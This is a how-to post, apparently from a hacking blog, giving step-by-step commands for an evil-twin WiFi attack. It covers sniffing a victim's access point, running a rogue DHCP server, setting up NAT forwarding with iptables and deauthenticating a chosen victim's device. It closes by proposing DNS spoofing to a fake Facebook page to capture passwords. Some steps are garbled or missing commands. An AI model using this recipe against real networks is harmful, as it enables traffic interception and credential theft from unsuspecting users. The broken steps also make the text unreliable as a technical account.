Set Up an Eviltwin
Step 1 Sniff the Air
First victims AP information must be observerdthere are two options to do so, I prefer this commands
"ifconfig wlan0 down"
"iwconfig wlan0 mode monitor"
"ifconfig wlan0 up"
"airmon-ng start wlan0"
if you have trouble with this type "airmon-ng check" and maybe kill some of the PIDS, but be aware not to kill your network connection.
If monitor mode is enabled start checking the air for the APs sending their beacons.
airodump-ng wlan0
The last command will provide you with useful information to set up the fake-AP.
- BSSID of the real AP
- channel of the real AP
- encryption of the real AP
- ESSID of the real AP
- BSSID 64:7C:34:92:2B:41
- Channel 2
- no encryption
- ESSID wireless
Let this terminal open and the airodump running.
Step 2 Set Up DHCP-Server
To provide our fake-AP with internet connection we have to set up an DHCP-server to configure the fake-AP with an IP-address and subnet.prove if isc-dhcp-server is already installed
open a new Terminal
if not
"apt-get install isc-dhcp-server"
"gedit /etc/dhcp/dhcpd.conf"
add this lines to the bottom
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0
{
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.2.255;
option domain-name-servers 8.8.8.8;
option routers 192.168.2.1;
range 192.168.2.20 192.168.2.60;
}
(please TAB the lines between the brackets)
the lease times set the time validity of the shared IP's.
save the file
Step 3 Create the Eviltwin
no type in the second terminalhere we have created the eviltwin-AP. I don't changed the BSSID, just the ESSID.
for completeness:
to change even the BSSID and not just the ESSID type
but for this attack is it not really necessary and just confuse while monitoring the results.
"airodump-ng --bssid C4:E9:84:0D:9C:FA -c 2 wlan0"
Term1: monitors the real-AP
Term2: runs the fake-AP
Term3: monitors the fake-AP
"ifconfig at0"
should show you some results now
"ifconfig at0 up"
"ifconfig at0 192.168.2.1 netmask 255.255.255.0"
now start the dhcp-server
"dhcpd -cf /etc/dhcp/dhcpd.conf "
to be sure the file is load correctly
"service isc-dhcp-server restart"
Step 5Configure Your Firewall
last step before we gojust type this commands
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD -j ACCEPT --in-interface at0
echo 1 > /proc/sys/net/ipv4/ipforward
They will configure your firewall to route all traffic from at0 to eth0.
The last command say to your networkcard: "act like a router and forward all traffic to his destination"
Step 6Shoot Down the Connection
open a fourth terminal and send deauthenticate frames to the device which sticks on the real-AP.--deauth 0 means that the frames will sending in an endless loop
(or till we have the connection we want to)
-a defines the BSSID of the AP
-c defines the MAC of the device we want to observe
we just shot down a specific device to avoid to much attention on network-flutter.
Step 7Conclusion
These steps seems complicated for this kind of wifi-hack. When you write a script for dhcp-server starting and flushing it won't take more than 2 minutes to set up this attack. Theoretically you can write a script for the whole setup.Benefit 1 is that this device now get provided the IP-address over our DHCP-server so we are in the same network...our network. (injection and so on).
Benefit 2 you can expand this attack to set up DNS-Spoofing. So the victim get redirect to a fake-Facebook site and we grab his password.
Comments
Post a Comment